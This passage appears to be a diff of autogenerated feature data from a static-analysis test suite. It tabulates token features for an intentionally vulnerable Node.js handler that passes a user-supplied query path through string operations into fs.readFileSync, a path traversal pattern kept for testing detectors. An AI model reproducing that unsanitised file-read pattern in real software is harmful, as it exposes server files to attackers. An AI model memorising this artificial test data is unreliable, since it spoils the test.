path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | this | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:5:31 | url | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | 'arguments' object of anonymous function | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | exceptional return of anonymous function | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | functio ... ENCY]\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | functio ... ENCY]\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | functio ... ENCY]\\n} | calleeImports | http | @@ -11204,6 +86825,81 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | functio ... ENCY]\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | functio ... ENCY]\\n} | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | functio ... ENCY]\\n} | receiverName | http | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:32:29:1 | return of anonymous function | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:41:5:43 | req | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:5:46:5:48 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:5:46:5:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:5:46:5:48 | res | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:5:46:5:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:5:46:5:48 | res | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:10 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:10 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:10 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path = ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:7:6:48 | path = ... ry.path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:16 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:16 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:16 | url | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:22 | url.parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:22 | url.parse | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | exceptional return of url.par ... , true) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | url.par ... , true) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:37 | url.par ... , true) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:43 | url.par ... ).query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:43 | url.par ... ).query | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:14:6:48 | url.par ... ry.path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:18:6:22 | parse | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:18:6:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:18:6:22 | parse | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:18:6:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:18:6:22 | parse | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:26 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:26 | req | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:26 | req | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:30 | req.url | calleeImports | url | @@ -11213,6 +86909,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:30 | req.url | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:6:24:6:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:28:6:30 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:28:6:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:28:6:30 | url | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:28:6:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:28:6:30 | url | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:6:33:6:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-string-steps.js:6:33:6:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-string-steps.js:6:33:6:36 | true | calleeImports | url | @@ -11222,6 +86923,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:6:33:6:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:6:33:6:36 | true | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:6:33:6:36 | true | receiverName | url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:39:6:43 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:39:6:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:39:6:43 | query | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:39:6:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:39:6:43 | query | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:6:45:6:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:6:45:6:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:6:45:6:48 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:6:45:6:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:6:45:6:48 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | exceptional return of fs.read ... (i, j)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | exceptional return of fs.read ... (i, j)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | exceptional return of fs.read ... (i, j)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | exceptional return of fs.read ... (i, j)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | exceptional return of fs.read ... (i, j)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | fs.read ... (i, j)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | fs.read ... (i, j)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | fs.read ... (i, j)) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | fs.read ... (i, j)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:7:2:7:38 | fs.read ... (i, j)) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:7:5:7:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:7:5:7:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| 